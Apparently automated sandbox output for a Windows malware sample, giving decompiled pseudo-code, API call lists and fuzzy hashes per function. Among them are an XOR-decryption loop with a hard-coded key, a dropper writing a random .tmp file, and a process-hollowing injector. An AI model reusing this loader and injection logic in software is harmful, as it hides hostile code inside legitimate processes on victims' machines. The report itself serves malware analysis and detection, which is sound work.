        						 *0x40ef74(_v16 + 0xc00, 0x28e32b02); // executed
        						E00401B0C( &_v32); // executed
        						 *0x40ef78 = E00401AF3( &_v32);
        						E004015AF();
        						E004015AF();
        						__eflags = 0;
        						return 0;
        					} else {
        						do {
        							 *(_v16 + _t190) =  *(_v16 + _t190) ^ ("fr8w44u61klsf0aplg[0ggmaeov&m5j2ff")[_v8];
        							__eflags = _v8 - 0x21;
        							if(_v8 == 0x21) {
        								_v8 = 0;
        							}
        							_t190 = _t190 + 1;
        							_v8 =  &(_v8->i);
        							__eflags = _t190 - _v12;
        						} while (_t190 < _v12);
        						goto L31;
        					}
        				} else {
        					do {
        						 *_t299 = E00401054( *_t289);
        						_t289 = _t289 + 4;
        						_t299 = _t299 + 4;
        						__eflags = _t289 - _v12;
        					} while (_t289 != _v12);
        					goto L20;
        				}
        			}

        APIs
        • GetSysColor.USER32(000003E8), ref: 004010B6
        • GetDoubleClickTime.USER32(?,00000000), ref: 004010BF
        • SetDoubleClickTime.USER32(00000000,?,00000000), ref: 004010CB
        • GetTickCount.KERNEL32 ref: 004010D1
        • GetDesktopWindow.USER32 ref: 004010E6
        • PeekMessageA.USER32 ref: 00401100
        • Sleep.KERNEL32(00000064,?,00000000), ref: 00401117
        • IsWindow.USER32(?), ref: 00401122
        • IsDialogMessageA.USER32(?,?,?,00000000), ref: 00401136
        • TranslateMessage.USER32(?), ref: 00401147
        • DispatchMessageA.USER32 ref: 00401154
        • IsDlgButtonChecked.USER32(?,00000007), ref: 0040115F
        • GetDesktopWindow.USER32 ref: 00401165
        • FindWindowA.USER32 ref: 00401181
        • SetWindowTextA.USER32(00000000,?), ref: 00401192
        • LoadLibraryA.KERNEL32(Kernel32.dll,?,00000000), ref: 004011A7
        • GetProcAddress.KERNEL32(00000000,GetTempPathA), ref: 004011AF
        • FindResourceA.KERNEL32(00000000,0000016E,0000011C), ref: 004011DD
        • IsClipboardFormatAvailable.USER32(00000002), ref: 004011E8
        • wsprintfA.USER32 ref: 004011FE
        • LoadResource.KERNEL32(00000000,?), ref: 0040120B
        • SizeofResource.KERNEL32(00000000,?,?,?,?), ref: 0040129A
        • GetLastError.KERNEL32 ref: 004012A3
        • GetCurrentProcess.KERNEL32(?), ref: 004012B3
        • TerminateProcess.KERNEL32(00000000), ref: 004012BA
        • LockResource.KERNEL32(00401CCF), ref: 004012C3
        • GetOpenFileNameA.COMDLG32(00000058), ref: 00401340
        • SetFileAttributesA.KERNEL32(?,00000080), ref: 00401358
        • lstrcmpiA.KERNEL32(?,GetTempPathA), ref: 0040136D
        • MessageBoxA.USER32 ref: 00401387
        • GetClassInfoW.USER32 ref: 004013C3
        • GetSysColor.USER32(?), ref: 004013CF
        • GetTempPathA.KERNEL32(00000104,?), ref: 004013DD
        • GetUserDefaultLangID.KERNEL32 ref: 004013E3
        • PathAddBackslashA.KERNELBASE(?), ref: 004013F0
        • lstrcatA.KERNEL32(?, athefff3h6266cd5fa708f.tmp), ref: 00401402
        • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0040141C
        • WriteFile.KERNELBASE(?,?,00000C00,?,00000000), ref: 004014E9
        • GetLastError.KERNEL32 ref: 004014EF
        • FormatMessageA.KERNELBASE(00001000,00000000,00000000,00000000,?,00000064,00000000), ref: 0040150C
        • CloseHandle.KERNEL32(?), ref: 00401515
        • IsWindowEnabled.USER32(00401CCF), ref: 0040151E
        • PostMessageA.USER32 ref: 0040152F
        • LoadLibraryA.KERNELBASE(?), ref: 0040153C
        • lstrlenA.KERNEL32(peagtfosapeh), ref: 0040154A
        • GetProcAddress.KERNEL32(00000000,peagtfosapeh), ref: 00401555
        • GetCurrentThreadId.KERNEL32 ref: 00401560
        • peagtfosapeh. ATHEFFF3H6266CD5FA708F(?,28E32B02), ref: 00401577
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: Message$Window$FileResource$Load$AddressClickColorCurrentDesktopDoubleErrorFindFormatLastLibraryPathProcProcessTime$AttributesAvailableBackslashButtonCheckedClassClipboardCloseCountCreateDefaultDialogDispatchEnabledHandleInfoLangLockNameOpenPeekPostSizeofSleepTempTerminateTextThreadTickTranslateUserWritelstrcatlstrcmpilstrlenpeagtfosapehwsprintf
        • String ID: athefff3h6266cd5fa708f.tmp$!$4rwsl5feha6g446p$All$BUTTON$GetTempPathA$Kernel32.dll$X$ecr6f1hda7ehw23grp51$peagtfosapeh
        • API String ID: 1282199338-2565982991
        • Opcode ID: d4d037168cdf705e2c413aa345491b2412fc18583c4a8845e99b8b9a8c625e62
        • Instruction ID: 40662582736761f9d9428d92394502f34322fec3036796530f137261310b5829
        • Opcode Fuzzy Hash: d4d037168cdf705e2c413aa345491b2412fc18583c4a8845e99b8b9a8c625e62
        • Instruction Fuzzy Hash: F6F11BB1D00219EFDB10DFA5DD88ADEBBB8FB08305F1045BAE505B62A1DB745A84CF58
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 42%
        			E10001000(SIZE_T* _a4, SIZE_T* _a8) {
        				CHAR* _v8;
        				intOrPtr _v12;
        				struct HINSTANCE__* _v16;
        				struct _PROCESS_INFORMATION _v32;
        				intOrPtr _v36;
        				intOrPtr _v40;
        				intOrPtr _v44;
        				intOrPtr _v48;
        				intOrPtr _v52;
        				void _v56;
        				struct _STARTUPINFOA _v124;
        				void _v379;
        				char _v380;
        				struct _CONTEXT _v1096;
        				_Unknown_base(*)()* _t107;
        				CHAR* _t123;
        				void* _t136;
        				void* _t158;
        				void* _t161;
        				signed int _t163;
        				signed int _t166;
        				void* _t170;
        				struct HINSTANCE__* _t173;
        				void* _t178;
        				CHAR* _t179;
        				void* _t181;
        
        				if(_a8 == 0x28e32b02) {
        					_t179 = _a4;
        					_a4 =  &(_a4[0x7d]);
        					_t163 = 0x11;
        					memset( &_v124, 0, _t163 << 2);
        					_t173 = GetModuleHandleA( &(_t179[0x129]));
        					_v16 = _t173;
        					_t107 = GetProcAddress(_t173, 0x10003000);
        					_a8 = _t107;
        					_v36 =  *_t107(_t173,  &(_t179[0x6c]), _t170, _t178, _t158);
        					_v40 = _a8(_t173,  &(_t179[0x87]));
        					_v12 = _a8(_t173,  &(_t179[0xd8]));
        					_v8 = _a8(_t173,  &(_t179[0x10e]));
        					_v52 = _a8(_t173,  &(_t179[0x51]));
        					_v48 = _a8(_t173,  &(_t179[0x144]));
        					_v44 = _a8(GetModuleHandleA(_t179),  &(_t179[0x1b]));
        					_v1096.ContextFlags = 0x10007;
        					_t161 = _a4 + _a4[0xf];
        					_t123 = _v8();
        					_v380 = _v380 & 0x00000000;
        					_v8 = _t123;
        					_t166 = 0x3f;
        					memset( &_v379, 0, _t166 << 2);
        					asm("stosw");
        					_v48(0,  &_v380, 0xff);
        					_v124.cb = 0x44;
        					CreateProcessA( &_v380, _v8, 0, 0, 0, 0x24, 0, 0,  &_v124,  &_v32);
        					_v8 = _a8(_v16,  &(_t179[0x36]));
        					_v12 = _a8(_v16,  &(_t179[0xbd]));
        					NtUnmapViewOfSection(_v32.hProcess,  *(_t161 + 0x34));
        					_t136 = VirtualAllocEx(_v32.hProcess,  *(_t161 + 0x34),  *(_t161 + 0x50), 0x3000, 0x40);
        					_t181 = _a4;
        					_v56 = _t136;
        					WriteProcessMemory(_v32.hProcess,  *(_t161 + 0x34), _t181,  *(_t161 + 0x54), 0);
        					_a8 = 0;
        					if( *(_t161 + 6) <= 0) {
        						L5:
        						GetThreadContext(_v32.hThread,  &_v1096);
        						WriteProcessMemory(_v32.hProcess, _v1096.Ebx + 8,  &_v56, 4, 0);
        						_v1096.Eax =  *((intOrPtr*)(_t161 + 0x28)) +  *(_t161 + 0x34);
        						SetThreadContext(_v32.hThread,  &_v1096);
        						ResumeThread(_v32.hThread);
        						return 0;
        					}
        					_a4 = 0;
        					do {
        						WriteProcessMemory(_v32,  *((intOrPtr*)(_a4 +  *((intOrPtr*)(_t181 + 0x3c)) + _t181 + 0xf8 + 0xc)) +  *(_t161 + 0x34),  *((intOrPtr*)(_a4 +  *((intOrPtr*)(_t181 + 0x3c)) + _t181 + 0x10c)) + _t181,  *(_a4 +  *((intOrPtr*)(_t181 + 0x3c)) + _t181 + 0x108), 0);
        						_a8 = _a8 + 1;
        						_a4 = _a4 + 0x28;
        					} while (_a8 < ( *(_t161 + 6) & 0x0000ffff));
        					goto L5;
        				}
        				return 0;
        			}

        APIs
        • GetModuleHandleA.KERNEL32(?), ref: 1000103D
        • GetProcAddress.KERNEL32(00000000,10003000), ref: 1000104A
        • GetModuleHandleA.KERNEL32(?,?), ref: 100010A5
        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000024,00000000,00000000,00000044,?), ref: 1000110E
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.203587581.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000001.00000002.203583958.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.203591799.0000000010002000.00000002.00020000.sdmp
        Similarity
        • API ID: HandleModule$AddressCreateProcProcess
        • String ID: ($D
        • API String ID: 4021000284-1229367909
        • Opcode ID: 39744b46a75ac6576c839fc4313280895390cc88ab62c019b72d10fdbd97ecd7
        • Instruction ID: 18af93879d43d3d8615236c09123fb992b543f7fac10d2d509d01180485a2bf9
        • Opcode Fuzzy Hash: 39744b46a75ac6576c839fc4313280895390cc88ab62c019b72d10fdbd97ecd7
        • Instruction Fuzzy Hash: 7F61C772800209BFDF11DFA4CC88EEEBBB9EF48314F10806AFA19A6151D7749A55DF64
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 89%
        			E00403D2A() {
        				char _v4;
        				void* __ecx;
        				long _t13;
        				long _t14;
        				char* _t20;
        				intOrPtr _t22;
        				intOrPtr _t23;
        				char* _t24;
        				char* _t26;
        				signed int _t27;
        				intOrPtr _t29;
        				void* _t30;
        				intOrPtr _t31;
        				signed int _t32;
        				signed int _t33;
        				char* _t36;
        				char* _t39;
        				char* _t40;
        				intOrPtr _t41;
        				signed int _t45;
        				int _t46;
        				void* _t48;
        				signed int _t51;
        				signed int _t54;
        				signed int _t56;
        				signed int _t58;
        				intOrPtr _t59;
        				long _t62;
        				intOrPtr* _t63;
        				intOrPtr _t74;
        				intOrPtr _t76;
        
        				_t46 = _t45 | 0xffffffff;
        				 *0x40f128 = 0;
        				 *0x40e3e8 = _t46;
        				 *0x40e3d8 = _t46;
        				_t13 = E00404ED4("TZ");
        				_t62 = _t13;
        				_pop(_t48);
        				if(_t62 != 0) {
        					if( *_t62 != 0) {
        						_t14 =  *0x40f1dc; // 0x0
        						if(_t14 == 0) {
        							L18:
        							E004022F7( *0x40f1dc);
        							_t13 = E00401F8B(E00404880(_t62) + 1);
        							 *0x40f1dc = _t13;
        							if(_t13 != 0) {
        								E00404790(_t13, _t62);
        								E00404990( *0x40e3cc, _t62, 3);
        								_t20 =  *0x40e3cc; // 0x40e34c
        								_t63 = _t62 + 3;
        								_t20[3] = _t20[3] & 0x00000000;
        								if( *_t63 == 0x2d) {
        									_push(1);
        									_t63 = _t63 + 1;
        									_pop(0);
        								}
        								_t51 = E00404DC5(_t48, _t63) * 0xe10;
        								 *0x40e340 = _t51;
        								while(1) {
        									_t22 =  *_t63;
        									if(_t22 != 0x2b && (_t22 < 0x30 || _t22 > 0x39)) {
        										break;
        									}
        									_t63 = _t63 + 1;
        								}
        								if( *_t63 != 0x3a) {
        									L36:
        									if(0 != 0) {
        										 *0x40e340 =  ~_t51;
        									}
        									_t23 =  *_t63;
        									 *0x40e344 = _t23;
        									if(_t23 == 0) {
        										goto L40;
        									} else {
        										E00404990( *0x40e3d0, _t63, 3);
        										_t26 =  *0x40e3d0; // 0x40e38c
        										_t26[3] = _t26[3] & 0x00000000;
        										return _t26;
        									}
        								}
        								_t63 = _t63 + 1;
        								_t27 = E00404DC5(_t51, _t63);
        								_t54 =  *0x40e340; // 0x7080
        								_t51 = _t54 + _t27 * 0x3c;
        								 *0x40e340 = _t51;
        								while(1) {
        									_t29 =  *_t63;
        									if(_t29 < 0x30 || _t29 > 0x39) {
        										break;
        									}
        									_t63 = _t63 + 1;
        								}
        								if( *_t63 != 0x3a) {
        									goto L36;
        								}
        								_t63 = _t63 + 1;
        								_t30 = E00404DC5(_t51, _t63);
        								_t56 =  *0x40e340; // 0x7080
        								_t51 = _t56 + _t30;
        								 *0x40e340 = _t51;
        								while(1) {
        									_t31 =  *_t63;
        									if(_t31 < 0x30 || _t31 > 0x39) {
        										goto L36;
        									}
        									_t63 = _t63 + 1;
        								}
        								goto L36;
        							}
        						} else {
        							_t13 = E00404E50(_t62, _t14);
        							_pop(_t48);
        							if(_t13 != 0) {
        								goto L18;
        							}
        						}
        					}
        				} else {
        					_t13 = GetTimeZoneInformation(0x40f130); // executed
        					if(_t13 != _t46) {
        						_t32 = 0x40f130->Bias; // 0x1e0
        						_t58 =  *0x40f184; // 0x0
        						_t33 = _t32 * 0x3c;
        						_t74 =  *0x40f176; // 0xb
        						_t59 = 1;
        						 *0x40e340 = _t33;
        						 *0x40f128 = _t59;
        						if(_t74 != 0) {
        							 *0x40e340 = _t33 + _t58 * 0x3c;
        						}
        						_t76 =  *0x40f1ca; // 0x3
        						if(_t76 == 0) {
        							L7:
        							 *0x40e344 = 0;
        							 *0x40e348 = 0;
        							goto L8;
        						} else {
        							_t41 =  *0x40f1d8; // 0xffffffc4
        							if(_t41 == 0) {
        								goto L7;
        							}
        							 *0x40e344 = _t59;
        							 *0x40e348 = (_t41 - _t58) * 0x3c;
        							L8:
        							_t1 =  &_v4; // 0x402279
        							if(WideCharToMultiByte( *0x40f234, 0x220, ?str?, _t46,  *0x40e3cc, 0x3f, 0, _t1) == 0 || _v4 != 0) {
        								_t36 =  *0x40e3cc; // 0x40e34c
        								 *_t36 =  *_t36 & 0x00000000;
        							} else {
        								_t40 =  *0x40e3cc; // 0x40e34c
        								_t40[0x3f] = _t40[0x3f] & 0x00000000;
        							}
        							_t5 =  &_v4; // 0x402279
        							if(WideCharToMultiByte( *0x40f234, 0x220, ?str?, _t46,  *0x40e3d0, 0x3f, 0, _t5) == 0 || _v4 != 0) {
        								L40:
        								_t24 =  *0x40e3d0; // 0x40e38c
        								 *_t24 =  *_t24 & 0x00000000;
        								return _t24;
        							} else {
        								_t39 =  *0x40e3d0; // 0x40e38c
        								_t39[0x3f] = _t39[0x3f] & 0x00000000;
        								return _t39;
        							}
        						}
        					}
        				}
        				return _t13;
        			}

        APIs
        • GetTimeZoneInformation.KERNELBASE(0040F130,?,00401586,?,?,?,00403D23,00402279,00000000,peagtfosapeh,00000000,?,00401BDA,?,?,?), ref: 00403D62
        • WideCharToMultiByte.KERNEL32(00000220,Pacific Standard Time,?,0000003F,00000000,y"@,?,?,?,00403D23,00402279,00000000,peagtfosapeh,00000000,?,00401BDA), ref: 00403DF7
        • WideCharToMultiByte.KERNEL32(00000220,Pacific Daylight Time,?,0000003F,00000000,y"@,?,?,?,00403D23,00402279,00000000,peagtfosapeh,00000000,?,00401BDA), ref: 00403E31
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: ByteCharMultiWide$InformationTimeZone
        • String ID: L@$Pacific Daylight Time$Pacific Standard Time$y"@
        • API String ID: 1904278450-2651511232
        • Opcode ID: 97961b1d252c7c0b78069c63fcb0b7dfd67abbeefdeb6346a8d88142f43e1b5d
        • Instruction ID: 5836fcb9fd4236726f856a08956557aaaeb77f5e42c1df6664730c776e31b8a5
        • Opcode Fuzzy Hash: 97961b1d252c7c0b78069c63fcb0b7dfd67abbeefdeb6346a8d88142f43e1b5d
        • Instruction Fuzzy Hash: 7B61F1B1A082429AD7349F66ED41B163FA9AB41301F18093FF884B72E0C7789E52CB5D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 87%
        			E00401B0C(intOrPtr* _a4) {
        				struct _SYSTEMTIME _v20;
        				struct _SYSTEMTIME _v36;
        				short _v54;
        				struct _TIME_ZONE_INFORMATION _v208;
        				void* __edi;
        				void* __esi;
        				signed int _t23;
        				signed int _t24;
        				intOrPtr _t31;
        				intOrPtr* _t36;
        				void* _t37;
        				void* _t39;
        				void* _t43;
        				void* _t44;
        				void* _t45;
        				void* _t46;
        				void* _t47;
        
        				GetLocalTime( &_v20);
        				GetSystemTime( &_v36);
        				_t43 = _v36.wMinute -  *0x40ef92; // 0x4
        				if(_t43 != 0) {
        					L6:
        					_t23 = GetTimeZoneInformation( &_v208); // executed
        					if(_t23 == 0xffffffff) {
        						_t24 = _t23 | 0xffffffff;
        					} else {
        						if(_t23 != 2 || _v54 == 0 || _v208.DaylightBias == 0) {
        							_t24 = 0;
        						} else {
        							_t24 = 1;
        						}
        					}
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_t37 = _t37;
        					 *0x40ef80 = _t24;
        					_t39 = _t39;
        					L14:
        					_t31 = E00402235(_t37, _t39, _v20.wYear & 0x0000ffff, _v20.wMonth & 0x0000ffff, _v20.wDay & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _t24);
        					_t36 = _a4;
        					if(_t36 == 0) {
        						return _t31;
        					}
        					 *_t36 = _t31;
        					return _t31;
        				}
        				_t44 = _v36.wHour -  *0x40ef90; // 0x4
        				if(_t44 != 0) {
        					goto L6;
        				}
        				_t45 = _v36.wDay -  *0x40ef8e; // 0x3
        				if(_t45 != 0) {
        					goto L6;
        				}
        				_t46 = _v36.wMonth -  *0x40ef8a; // 0x8
        				if(_t46 != 0) {
        					goto L6;
        				}
        				_t47 = _v36.wYear -  *0x40ef88; // 0x7e5
        				if(_t47 != 0) {
        					goto L6;
        				}
        				_t24 =  *0x40ef80; // 0x1
        				goto L14;
        			}

        APIs
        • GetLocalTime.KERNEL32(?), ref: 00401B19
        • GetSystemTime.KERNEL32(?), ref: 00401B23
        • GetTimeZoneInformation.KERNELBASE(?), ref: 00401B78
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: Time$InformationLocalSystemZone
        • String ID: peagtfosapeh
        • API String ID: 2475273158-1931456857
        • Opcode ID: e46d82e06c89ad7da047e3dd66e3653f9e827ec92eed376e6acac51d821b1b5b
        • Instruction ID: 52ebf5b42d5d009e41bdf42155f7a55d4a88f1fa23556fd2c6c295d3821e46f0
        • Opcode Fuzzy Hash: e46d82e06c89ad7da047e3dd66e3653f9e827ec92eed376e6acac51d821b1b5b
        • Instruction Fuzzy Hash: F5212C2990011AE9DB20AB99D945AFF76B9BB08714F800522FD15B62E0E37C9D96C738
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 72%
        			_entry_(void* __ebx, void* __edi, void* __esi) {
        				CHAR* _v8;
        				intOrPtr* _v24;
        				intOrPtr _v28;
        				struct _STARTUPINFOA _v96;
        				intOrPtr _v100;
        				intOrPtr _v104;
        				intOrPtr _v108;
        				unsigned int _t15;
        				signed int _t26;
        				intOrPtr _t28;
        				void* _t31;
        				signed int _t34;
        				intOrPtr _t50;
        
        				_push(0xffffffff);
        				_push(0x40c160);
        				_push(E00402C1C);
        				_push( *[fs:0x0]);
        				 *[fs:0x0] = _t50;
        				_push(__esi);
        				_v28 = _t50 - 0x58;
        				_t15 = GetVersion();
        				 *0x40efbc = 0;
        				_t34 = _t15 & 0x000000ff;
        				 *0x40efb8 = _t34;
        				 *0x40efb4 = _t34 << 8;
        				 *0x40efb0 = _t15 >> 0x10;
        				if(E00402AE5(0) == 0) {
        					E00401D1C(0x1c);
        				}
        				_v8 = 0;
        				E0040293A();
        				 *0x410a58 = GetCommandLineA();
        				 *0x40ef98 = E00402808();
        				E004025BB();
        				E00402502();
        				E00401E60();
        				_v96.dwFlags = 0;
        				GetStartupInfoA( &_v96);
        				_v104 = E004024AA();
        				_t53 = _v96.dwFlags & 0x00000001;
        				if((_v96.dwFlags & 0x00000001) == 0) {
        					_t26 = 0xa;
        				} else {
        					_t26 = _v96.wShowWindow & 0x0000ffff;
        				}
        				_push(_t26);
        				_push(_v104);
        				_push(0);
        				_push(GetModuleHandleA(0)); // executed
        				_t28 = E0040105A(); // executed
        				_v100 = _t28;
        				E00401E8D(_t28);
        				_t30 = _v24;
        				_t39 =  *((intOrPtr*)( *_v24));
        				_v108 =  *((intOrPtr*)( *_v24));
        				_t31 = E00402326(0, _t53, _t39, _t30); // executed
        				return _t31;
        			}

        APIs
        • GetVersion.KERNEL32 ref: 00401C27
          • Part of subcall function 00402AE5: HeapCreate.KERNELBASE(00000000,00001000,00000000,00401C60,00000000), ref: 00402AF6
          • Part of subcall function 00402AE5: HeapDestroy.KERNEL32 ref: 00402B14
        • GetCommandLineA.KERNEL32 ref: 00401C75
        • GetStartupInfoA.KERNEL32(?), ref: 00401CA0
        • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00401CC3
          • Part of subcall function 00401D1C: ExitProcess.KERNEL32 ref: 00401D39
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
        • String ID:
        • API String ID: 2057626494-0
        • Opcode ID: f537686c66c02ca70e4a5b01c48241de77aecdc079a3055343b65443c747ab14
        • Instruction ID: 75f3ac77dbf1e2069170e3b69c6953e13768a6a03d0162f08dd168863ae30c51
        • Opcode Fuzzy Hash: f537686c66c02ca70e4a5b01c48241de77aecdc079a3055343b65443c747ab14
        • Instruction Fuzzy Hash: 5221A1B0944215EEDB04AFA2DE4AA6EBBB8EF04704F10413EF805B72E0DB7C4440CB58
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040A813() {
        				_Unknown_base(*)()* _t1;
        
        				_t1 = SetUnhandledExceptionFilter(E0040A7CD); // executed
        				 *0x40f6a8 = _t1;
        				return _t1;
        			}

        APIs
        • SetUnhandledExceptionFilter.KERNELBASE(Function_0000A7CD), ref: 0040A818
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: ExceptionFilterUnhandled
        • String ID:
        • API String ID: 3192549508-0
        • Opcode ID: 763f2cd4770b2ad903e6415f1d4cd37e1c68d59bf78b5fb6da0b567fa8578524
        • Instruction ID: 84051c8a21b34ff1bcaae610dbce1785ed4774f14ffcd3f9921292504844d160
        • Opcode Fuzzy Hash: 763f2cd4770b2ad903e6415f1d4cd37e1c68d59bf78b5fb6da0b567fa8578524
        • Instruction Fuzzy Hash: 6CA002F4553700DFD7207FB4AE895067AB0A644B02720857BA802B36B6EB7D4065DE2E
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • SetUnhandledExceptionFilter.KERNELBASE ref: 0040A82A
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: ExceptionFilterUnhandled
        • String ID:
        • API String ID: 3192549508-0
        • Opcode ID: f6e584ab4c4dea2fa8637cac1696d256f74dc57c4427400b879fa199b27a3853
        • Instruction ID: 4192e2497110465cce471e6136dd20b0f5512295cee06bc732af318dccda3813
        • Opcode Fuzzy Hash: f6e584ab4c4dea2fa8637cac1696d256f74dc57c4427400b879fa199b27a3853
        • Instruction Fuzzy Hash:
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00403538() {
        				signed int _t15;
        				void* _t17;
        				void* _t19;
        				void* _t25;
        				signed int _t26;
        				void* _t27;
        				intOrPtr* _t29;
        
        				_t15 =  *0x410918; // 0x1
        				_t26 =  *0x410908; // 0x10
        				if(_t15 != _t26) {
        					L3:
        					_t27 =  *0x41091c; // 0x21d0488
        					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
        					_t17 = RtlAllocateHeap( *0x410920, 8, 0x41c4); // executed
        					 *(_t29 + 0x10) = _t17;
        					if(_t17 == 0) {
        						L6:
        						return 0;
        					}
        					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4); // executed
        					 *(_t29 + 0xc) = _t19;
        					if(_t19 != 0) {
        						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
        						 *_t29 = 0;
        						 *((intOrPtr*)(_t29 + 4)) = 0;
        						 *0x410918 =  *0x410918 + 1;
        						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
        						return _t29;
        					}
        					HeapFree( *0x410920, 0,  *(_t29 + 0x10));
        					goto L6;
        				}
        				_t2 = _t26 * 4; // 0x60
        				_t25 = HeapReAlloc( *0x410920, 0,  *0x41091c, _t26 + _t2 + 0x50 << 2);
        				if(_t25 == 0) {
        					goto L6;
        				}
        				 *0x410908 =  *0x410908 + 0x10;
        				 *0x41091c = _t25;
        				_t15 =  *0x410918; // 0x1
        				goto L3;
        			}

        APIs
        • HeapReAlloc.KERNEL32(00000000,00000060,?,00000000,00403300,?,?,?,00000100,?,00000000), ref: 00403560
        • RtlAllocateHeap.NTDLL(00000008,000041C4,?,00000000,00403300,?,?,?,00000100,?,00000000), ref: 00403594
        • VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004,?,00000000,00403300,?,?,?,00000100,?,00000000), ref: 004035AE
        • HeapFree.KERNEL32(00000000,?,?,00000000,00403300,?,?,?,00000100,?,00000000), ref: 004035C5
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: Heap$Alloc$AllocateFreeVirtual
        • String ID:
        • API String ID: 1005975451-0
        • Opcode ID: d28ead1cf6bbc67ec5d101fc6d5be3af79ab5a92f936a3eded6fdb61d874581c
        • Instruction ID: e56c9388084e7bf3775c78df29ba9697de4bf734b389455db41c5c75bab89719
        • Opcode Fuzzy Hash: d28ead1cf6bbc67ec5d101fc6d5be3af79ab5a92f936a3eded6fdb61d874581c
        • Instruction Fuzzy Hash: B11154B1221204EFE7218F59EC95D927BB6F784725710863AF151D71F1C3B19A81CF58
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 74%
        			E00401EAF(void* __esi, int _a4, intOrPtr _a8, char _a12) {
        				void* _t6;
        				intOrPtr _t7;
        				intOrPtr* _t9;
        				char _t14;
        				intOrPtr _t20;
        				intOrPtr _t21;
        				void* _t22;
        				intOrPtr* _t23;
        				void* _t25;
        				void* _t30;
        
        				_t22 = __esi;
        				_t21 = 1;
        				_t25 =  *0x40efec - _t21; // 0x1
        				if(_t25 == 0) {
        					TerminateProcess(GetCurrentProcess(), _a4);
        				}
        				_t14 = _a12;
        				 *0x40efe8 = _t21;
        				 *0x40efe4 = _t14;
        				if(_a8 == 0) {
        					_t7 =  *0x410a50; // 0x21e0520
        					if(_t7 != 0) {
        						_t20 =  *0x410a4c; // 0x21e0594
        						_push(_t22);
        						_t4 = _t20 - 4; // 0x21e0590
        						_t23 = _t4;
        						if(_t23 >= _t7) {
        							do {
        								_t9 =  *_t23;
        								if(_t9 != 0) {
        									 *_t9();
        								}
        								_t23 = _t23 - 4;
        								_t30 = _t23 -  *0x410a50; // 0x21e0520
